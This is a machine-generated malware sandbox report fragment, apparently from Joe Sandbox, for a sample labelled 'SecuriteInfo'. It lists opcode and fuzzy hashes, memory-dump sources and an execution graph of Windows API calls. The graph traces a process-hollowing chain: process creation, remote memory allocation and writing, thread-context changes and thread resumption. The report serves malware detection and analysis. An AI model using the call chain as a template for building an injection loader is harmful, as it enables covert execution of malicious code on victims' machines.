                                                                                                                                                                      • Instruction ID: 9e61990e92c8b85395f1dd2b7a604ecb093a51bef02f7404a506852324c14001
                                                                                                                                                                      • Opcode Fuzzy Hash: dda8cd611c70f3e5ac47d95265baca23450086dd672a55e7653a6722a4b42b81
                                                                                                                                                                      • Instruction Fuzzy Hash: C42126B58002599FDB10CFAAD844ADEBFF8EB48320F14845AE559A7220C335A950DFA5
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07B5D776
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: 0a0a15ad410eeeb27d12dd63aa667c6bbf0cd952856d8403a809fda07ec92999
                                                                                                                                                                      • Instruction ID: 4137cf3fb773368921ae450222da03f03fc46a0938b5f99b8eff28aa19fcff5a
                                                                                                                                                                      • Opcode Fuzzy Hash: 0a0a15ad410eeeb27d12dd63aa667c6bbf0cd952856d8403a809fda07ec92999
                                                                                                                                                                      • Instruction Fuzzy Hash: 0E1137B29002499FDB10DFAAC844BDEFFF5EF88320F208819E559A7250C775A544CFA5
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                                      • Opcode ID: 6c6516d00728e5aa285e52228f87e7376efb74907fe5d8f7b0396bd8f2cdcbcd
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a01fa6d9cdf47f981ed58bc582786be7eef12a007e29e7a3a01fc001bab5a478
                                                                                                                                                                      • Instruction ID: f796e5d8595495cc539719514ffd6c566975711822904805662ead6a8c0bcf5d
                                                                                                                                                                      • Opcode Fuzzy Hash: a01fa6d9cdf47f981ed58bc582786be7eef12a007e29e7a3a01fc001bab5a478
                                                                                                                                                                      • Instruction Fuzzy Hash: 67E1C7B4E002198FDB14DF99D984AAEBBB2FF89304F248169D814AB355D731AD42CF61
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 18a3b368881d0b5c19d3e88491eb677c894b87ba914ffd407a7ac528fb65da2e
                                                                                                                                                                      • Instruction ID: f663ea676b2bdfabbee0bd4c6f52903c969635c7353a122bb77c84998918b3a0
                                                                                                                                                                      • Opcode Fuzzy Hash: 18a3b368881d0b5c19d3e88491eb677c894b87ba914ffd407a7ac528fb65da2e
                                                                                                                                                                      • Instruction Fuzzy Hash: D6E1D9B4E102198FDB14CF99D980AAEFBB2FF89304F24C169D914AB355D731A942CF60
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: dfc8e0252dce2c7c027fd0627aefb99f9d52a741834897a0cbf2cb88b46be86e
                                                                                                                                                                      • Instruction ID: 932454cfa908ebaeecccc6ce9eb44db330f485f7ff209397462dbc23b2c4eec1
                                                                                                                                                                      • Opcode Fuzzy Hash: dfc8e0252dce2c7c027fd0627aefb99f9d52a741834897a0cbf2cb88b46be86e
                                                                                                                                                                      • Instruction Fuzzy Hash: 56E1DAB4E002198BDB14CFA9D990AAEBBF2FB89304F24C169D914A7355D731AD42CF61
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2b6c80c7ac7b74db8399a230d1c5215621f91f25d67f96a50212c684e68c5810
                                                                                                                                                                      • Instruction ID: 53bbc85462c8d955dc8b2b1462f4d662069e9a60ec6ccda33b5dd2e8538936e8
                                                                                                                                                                      • Opcode Fuzzy Hash: 2b6c80c7ac7b74db8399a230d1c5215621f91f25d67f96a50212c684e68c5810
                                                                                                                                                                      • Instruction Fuzzy Hash: CBE1E9B4E002198FDB14DF99D980AAEBBB2FF89304F24C269D815A7355D730AD42CF60
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 7b71596cef552458235b22368f0b6b574b7daf85554ade07ba45b477045c4236
                                                                                                                                                                      • Instruction ID: ee72ef6ae748668e8368e3fe448e93f154902cd0e0d5f1d2242f465da28d7785
                                                                                                                                                                      • Opcode Fuzzy Hash: 7b71596cef552458235b22368f0b6b574b7daf85554ade07ba45b477045c4236
                                                                                                                                                                      • Instruction Fuzzy Hash: 5EE1DAB4E0021A8FDB14CF99D980AAEBBB2FF89304F24C569D814A7355D731A942CF60
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1724541597.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_1780000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 889392da1f419cf53a2637c823f4d463e3ea9194fdcae6e93369d6130b610be4
                                                                                                                                                                      • Instruction ID: 997e5e2639a38f0e59cacdb593db8aca446a1567d4919acb61b0e1fc7066b92c
                                                                                                                                                                      • Opcode Fuzzy Hash: 889392da1f419cf53a2637c823f4d463e3ea9194fdcae6e93369d6130b610be4
                                                                                                                                                                      • Instruction Fuzzy Hash: EAA18F32E4061ACFCF05EFB4C88449EFBB2FF85310B15856AE905AB265DB71E955CB80
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1730192031.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5770000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0cf63a373dfaf618d7d321168f387bbe0de54c36ce95fd61166486aa1455bd37
                                                                                                                                                                      • Instruction ID: 05d245fab819494c487a58a93250396c7402ae28781261df164362e7a3486318
                                                                                                                                                                      • Opcode Fuzzy Hash: 0cf63a373dfaf618d7d321168f387bbe0de54c36ce95fd61166486aa1455bd37
                                                                                                                                                                      • Instruction Fuzzy Hash: 29C1F7B08037468ED720EF68EC481897BF1BB86315F655209DD616B2ECDBBC146ACF54
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1730192031.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5770000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 182a9e0ee35a522b4e14fda5769ee8755abd410e94efcf58496e29636fc05c5b
                                                                                                                                                                      • Instruction ID: 022487bb3e1e4ae96e4fa6dc1978c1cdc29b50f668e68328e76bb3d3adfde7bb
                                                                                                                                                                      • Opcode Fuzzy Hash: 182a9e0ee35a522b4e14fda5769ee8755abd410e94efcf58496e29636fc05c5b
                                                                                                                                                                      • Instruction Fuzzy Hash: 9D71E571610A098FEB34CF39D485A96B7F6FB49304B044E69E4A2CB650D774F845DB80
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: ce16465a7c7e5172d36b52f52b1725eca6b7b986ef6779505b9982d98adde98b
                                                                                                                                                                      • Instruction ID: 3d32269a6ddd349f43722d1e97916f2de2197e04d42300838460c8aed050b7b7
                                                                                                                                                                      • Opcode Fuzzy Hash: ce16465a7c7e5172d36b52f52b1725eca6b7b986ef6779505b9982d98adde98b
                                                                                                                                                                      • Instruction Fuzzy Hash: 487174B4E016598FDB04DFAAD98469EFBF2BF88310F14D166E818AB315DB349942CF50
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 84e213c8867855860f61d18d616f4216fdf157c0042c55915cbaa6016c1674aa
                                                                                                                                                                      • Instruction ID: a862f0d29aefc992ef9f10957231404eae0f747254f0f175d7a81705361d673b
                                                                                                                                                                      • Opcode Fuzzy Hash: 84e213c8867855860f61d18d616f4216fdf157c0042c55915cbaa6016c1674aa
                                                                                                                                                                      • Instruction Fuzzy Hash: 585163B5E006198FDB48DFAAD98469DFBF2BF88300F14C16AD819AB314DB349946CF40
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000B.00000002.1989657496.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_11_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: Xbq$Xbq$Xbq$Xbq
                                                                                                                                                                      • API String ID: 0-2732225958
                                                                                                                                                                      • Opcode ID: c47f0829aedb93e8340c162bb3862ff04151491a2f37586e62fab1968c669407
                                                                                                                                                                      • Instruction ID: 2cee819d859a37013a130a1b197790424b5bde06e5c2d7a4add3f29e65008424
                                                                                                                                                                      • Opcode Fuzzy Hash: c47f0829aedb93e8340c162bb3862ff04151491a2f37586e62fab1968c669407
                                                                                                                                                                      • Instruction Fuzzy Hash: E6C127359082968FDB228B7899503EFBFF5AF8A204F2885DDC8865720BDF34955BC741
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000B.00000002.1989657496.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_11_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: Xbq$$^q
                                                                                                                                                                      • API String ID: 0-1593437937
                                                                                                                                                                      • Opcode ID: 30d68eb5056dd9cad251eecdb7f3f79c3a2ff58b6c911c46619f81056a13a6e6
                                                                                                                                                                      • Instruction ID: 5e214215833d794d3c0d5843ff12795441321aa31ad8ecd4ca76cffe1c16f3c0
                                                                                                                                                                      • Opcode Fuzzy Hash: 30d68eb5056dd9cad251eecdb7f3f79c3a2ff58b6c911c46619f81056a13a6e6
                                                                                                                                                                      • Instruction Fuzzy Hash: 68F17C74E44219CFCB08DFB8D4546AEBBB2FF88310B24896DD846AB354CF359806CB85
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000B.00000002.1989657496.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_11_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: Xbq$Xbq
                                                                                                                                                                      • API String ID: 0-1243427068
                                                                                                                                                                      • Opcode ID: fea9aee6c908da8c39df1d4d6c2674f68863141cebf00d3f632762a78e222999
                                                                                                                                                                      • Instruction ID: d20da5b1c636322424ae82509af43ff8ebe067889506ebe977fe2aec09b81946
                                                                                                                                                                      • Opcode Fuzzy Hash: fea9aee6c908da8c39df1d4d6c2674f68863141cebf00d3f632762a78e222999
                                                                                                                                                                      • Instruction Fuzzy Hash: AE310535B443248BDF194B7999D437EAAB6ABC4314F2888BDE802C7390DF75CC4A8791
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000B.00000002.1989657496.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_11_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: LR^q
                                                                                                                                                                      • API String ID: 0-2625958711
                                                                                                                                                                      • Opcode ID: 69fd8a4885c1afc9e6db9f9d92d3c3bd8c81cab00b4074ee50ca5c783a6ddddb
                                                                                                                                                                      • Instruction ID: 897699842329d665c4ea865ebffcb76ec72949a323f9f1f78e7b21e0b0e05f84
                                                                                                                                                                      • Opcode Fuzzy Hash: 69fd8a4885c1afc9e6db9f9d92d3c3bd8c81cab00b4074ee50ca5c783a6ddddb
                                                                                                                                                                      • Instruction Fuzzy Hash: 7C52BD78D40219CFCB54EF64EA98A9DBBF2FB58309F1049A5D409AB758DB305E85CF80
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000B.00000002.1989657496.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_11_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: LR^q
                                                                                                                                                                      • API String ID: 0-2625958711
                                                                                                                                                                      • Opcode ID: 2673f37b79fda5e77d6d75382721a18c49b066e0f92d1c19e737fd707d4e72a4
                                                                                                                                                                      • Instruction ID: 3e73e4a56ac8ddf59a530f5ef7fafe60cc9df50c0b87726cb94bafdfb75bb17c
                                                                                                                                                                      • Opcode Fuzzy Hash: 2673f37b79fda5e77d6d75382721a18c49b066e0f92d1c19e737fd707d4e72a4
                                                                                                                                                                      • Instruction Fuzzy Hash: FB529D78D40219CFCB54EF64EA98A9DBBF2FB58309F1049A5D409AB758DB305E85CF40
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000B.00000002.1989657496.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_11_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 5a507a14e5efe7b254dd905a9fa4f0468f202f51622e37f81e8d3277f4f4575e
                                                                                                                                                                      • Instruction ID: 56b779f3c1be38d5f50395fac9021723b25abbcda32b44fb4683c4ea9839624a
                                                                                                                                                                      • Opcode Fuzzy Hash: 5a507a14e5efe7b254dd905a9fa4f0468f202f51622e37f81e8d3277f4f4575e
                                                                                                                                                                      • Instruction Fuzzy Hash: 7E219D75A002059FCB28DF24C480AAE77A5EB9D668B20C41DD84A9B240DF34EA47CBD2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000B.00000002.1989657496.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_11_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 9da0d727b7b7611ea7b3879a589248ecb87913b9a811a314014dbd02a36eff7d
                                                                                                                                                                      • Instruction ID: e5c733ae7590a96ab19bc5b32f220103d91488ae1e415a30933975d5355eeee1
                                                                                                                                                                      • Opcode Fuzzy Hash: 9da0d727b7b7611ea7b3879a589248ecb87913b9a811a314014dbd02a36eff7d
                                                                                                                                                                      • Instruction Fuzzy Hash: 0D31A674E11309CFCB44DFA8E59889DBBB2FF49309B204469E919AB364DB31AD46CF40
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000B.00000002.1989657496.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_11_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f6eb438499a4fc838bedf72365075222f7d0c0ccaa6d0ad105b6ef41101ee024
                                                                                                                                                                      • Instruction ID: b64dd4d2d2f577ab14e626b9793131bd50590232d9450dedfcedfe61e94284b7
                                                                                                                                                                      • Opcode Fuzzy Hash: f6eb438499a4fc838bedf72365075222f7d0c0ccaa6d0ad105b6ef41101ee024
                                                                                                                                                                      • Instruction Fuzzy Hash: C021CE74D0520ACFCB01EFA9D9856EEBBF4FF19304F10556AD819B7210EB305A96CBA1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000B.00000002.1989657496.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_11_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 78c6a49b14e6fedadfc8c225d25d8925cf6359cec1eec0fcfae7efb05bc98f34
                                                                                                                                                                      • Instruction ID: a48e284d81f646366801e14ff7c7b221b3604c1b7a92e8cc141683a10d7047c8
                                                                                                                                                                      • Opcode Fuzzy Hash: 78c6a49b14e6fedadfc8c225d25d8925cf6359cec1eec0fcfae7efb05bc98f34
                                                                                                                                                                      • Instruction Fuzzy Hash: C5E02636D2032A8BCB02EBB0EC410EEB734ADD1221B15855BC0A532081EB30224BC7A2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000B.00000002.1989657496.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_11_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: b503962c535854a3d0c26ce597b0c90f39579257fe22cec449bdb92c4e67e7ee
                                                                                                                                                                      • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                                                                                                                                                      • Opcode Fuzzy Hash: b503962c535854a3d0c26ce597b0c90f39579257fe22cec449bdb92c4e67e7ee
                                                                                                                                                                      • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:9.8%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                      Total number of Nodes:179
                                                                                                                                                                      Total number of Limit Nodes:6
                                                                                                                                                                      execution_graph 38054 9cb318 38057 9cb401 38054->38057 38055 9cb327 38058 9cb421 38057->38058 38059 9cb444 38057->38059 38058->38059 38060 9cb648 GetModuleHandleW 38058->38060 38059->38055 38061 9cb675 38060->38061 38061->38055 38237 509a3ed 38238 509a3fd 38237->38238 38240 509d181 ResumeThread 38238->38240 38241 509d190 ResumeThread 38238->38241 38239 509a990 38240->38239 38241->38239 38253 9cd8e8 DuplicateHandle 38254 9cd97e 38253->38254 38255 9c4c68 38256 9c4c82 38255->38256 38257 9c4c93 38256->38257 38259 9c4dc1 38256->38259 38260 9c4de5 38259->38260 38264 9c4ed0 38260->38264 38268 9c4ec1 38260->38268 38265 9c4ef7 38264->38265 38266 9c4fd4 38265->38266 38272 9c4a18 38265->38272 38269 9c4ed0 38268->38269 38270 9c4fd4 38269->38270 38271 9c4a18 CreateActCtxA 38269->38271 38271->38270 38273 9c5f60 CreateActCtxA 38272->38273 38275 9c6023 38273->38275 38062 509a64f 38063 509a65f 38062->38063 38067 509d181 38063->38067 38071 509d190 38063->38071 38064 509a686 38068 509d1c3 38067->38068 38069 509d231 38068->38069 38075 509d578 38068->38075 38069->38064 38072 509d1c3 38071->38072 38073 509d231 38072->38073 38074 509d578 ResumeThread 38072->38074 38073->38064 38074->38073 38076 509d55a 38075->38076 38077 509d57f ResumeThread 38075->38077 38076->38069 38079 509d5f1 38077->38079 38079->38069 38080 509e4d1 38082 509e261 38080->38082 38081 509e270 38082->38081 38085 509fc08 38082->38085 38090 509fbf8 38082->38090 38086 509fc1d 38085->38086 38095 509fc38 38086->38095 38111 509fc48 38086->38111 38087 509fc2f 38087->38082 38091 509fc1d 38090->38091 38093 509fc38 12 API calls 38091->38093 38094 509fc48 12 API calls 38091->38094 38092 509fc2f 38092->38082 38093->38092 38094->38092 38096 509fc62 38095->38096 38097 509fc86 38096->38097 38127 e2604c4 38096->38127 38131 e2603b9 38096->38131 38139 e2602ba 38096->38139 38144 e26083f 38096->38144 38148 e2607bf 38096->38148 38152 e260413 38096->38152 38156 e2601d5 38096->38156 38160 e2606d7 38096->38160 38164 e260508 38096->38164 38169 e26034c 38096->38169 38177 e260480 38096->38177 38182 e2604a2 38096->38182 38187 e260385 38096->38187 38097->38087 38112 509fc62 38111->38112 38113 509fc86 38112->38113 38114 e2604c4 2 API calls 38112->38114 38115 e260385 2 API calls 38112->38115 38116 e2604a2 2 API calls 38112->38116 38117 e260480 2 API calls 38112->38117 38118 e26034c 4 API calls 38112->38118 38119 e260508 2 API calls 38112->38119 38120 e2606d7 2 API calls 38112->38120 38121 e2601d5 2 API calls 38112->38121 38122 e260413 2 API calls 38112->38122 38123 e2607bf 2 API calls 38112->38123 38124 e26083f 2 API calls 38112->38124 38125 e2602ba 2 API calls 38112->38125 38126 e2603b9 4 API calls 38112->38126 38113->38087 38114->38113 38115->38113 38116->38113 38117->38113 38118->38113 38119->38113 38120->38113 38121->38113 38122->38113 38123->38113 38124->38113 38125->38113 38126->38113 38192 509d629 38127->38192 38196 509d630 38127->38196 38128 e2604b5 38132 e260361 38131->38132 38134 e2603c2 38131->38134 38135 509d629 Wow64SetThreadContext 38132->38135 38136 509d630 Wow64SetThreadContext 38132->38136 38133 e260366 38133->38134 38137 509d578 ResumeThread 38133->38137 38200 509d580 38133->38200 38134->38097 38134->38134 38135->38133 38136->38133 38137->38134 38140 e26062a 38139->38140 38204 509d7c8 38140->38204 38208 509d7c0 38140->38208 38141 e26064e 38146 509d7c8 WriteProcessMemory 38144->38146 38147 509d7c0 WriteProcessMemory 38144->38147 38145 e26086d 38146->38145 38147->38145 38212 509d708 38148->38212 38216 509d700 38148->38216 38149 e2607ec 38221 509dcb8 38152->38221 38225 509dcb0 38152->38225 38153 e260234 38153->38097 38229 509de50 38156->38229 38233 509de47 38156->38233 38162 509d578 ResumeThread 38160->38162 38163 509d580 ResumeThread 38160->38163 38161 e26070e 38162->38161 38163->38161 38165 e260529 38164->38165 38166 e26070e 38165->38166 38167 509d578 ResumeThread 38165->38167 38168 509d580 ResumeThread 38165->38168 38167->38166 38168->38166 38170 e260361 38169->38170 38173 509d629 Wow64SetThreadContext 38170->38173 38174 509d630 Wow64SetThreadContext 38170->38174 38171 e260366 38172 e26070e 38171->38172 38175 509d578 ResumeThread 38171->38175 38176 509d580 ResumeThread 38171->38176 38172->38097 38173->38171 38174->38171 38175->38172 38176->38172 38178 e26049c 38177->38178 38179 e26070e 38178->38179 38180 509d578 ResumeThread 38178->38180 38181 509d580 ResumeThread 38178->38181 38179->38179 38180->38179 38181->38179 38183 e2604af 38182->38183 38185 509d7c8 WriteProcessMemory 38183->38185 38186 509d7c0 WriteProcessMemory 38183->38186 38184 e260a61 38185->38184 38186->38184 38188 e260397 38187->38188 38189 e2607ec 38188->38189 38190 509d708 VirtualAllocEx 38188->38190 38191 509d700 VirtualAllocEx 38188->38191 38190->38189 38191->38189 38193 509d675 Wow64SetThreadContext 38192->38193 38195 509d6bd 38193->38195 38195->38128 38197 509d675 Wow64SetThreadContext 38196->38197 38199 509d6bd 38197->38199 38199->38128 38201 509d5c0 ResumeThread 38200->38201 38203 509d5f1 38201->38203 38203->38134 38205 509d810 WriteProcessMemory 38204->38205 38207 509d867 38205->38207 38207->38141 38209 509d810 WriteProcessMemory 38208->38209 38211 509d867 38209->38211 38211->38141 38213 509d748 VirtualAllocEx 38212->38213 38215 509d785 38213->38215 38215->38149 38217 509d705 38216->38217 38218 509d6e2 38217->38218 38219 509d752 VirtualAllocEx 38217->38219 38218->38149 38220 509d785 38219->38220 38220->38149 38222 509dd03 ReadProcessMemory 38221->38222 38224 509dd47 38222->38224 38224->38153 38226 509dc92 38225->38226 38226->38225 38227 509dd16 ReadProcessMemory 38226->38227 38228 509dd47 38227->38228 38228->38153 38230 509ded9 CreateProcessA 38229->38230 38232 509e09b 38230->38232 38232->38232 38234 509ded9 CreateProcessA 38233->38234 38236 509e09b 38234->38236 38236->38236 38276 9cd6a0 38277 9cd6e6 GetCurrentProcess 38276->38277 38279 9cd738 GetCurrentThread 38277->38279 38280 9cd731 38277->38280 38281 9cd76e 38279->38281 38282 9cd775 GetCurrentProcess 38279->38282 38280->38279 38281->38282 38283 9cd7ab GetCurrentThreadId 38282->38283 38285 9cd804 38283->38285 38242 e260e88 38243 e260e69 38242->38243 38244 e260e8f 38242->38244 38244->38243 38247 e261110 38244->38247 38251 e261118 PostMessageW 38244->38251 38248 e261117 PostMessageW 38247->38248 38249 e2610f2 38247->38249 38250 e261184 38248->38250 38249->38247 38250->38244 38252 e261184 38251->38252 38252->38244

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
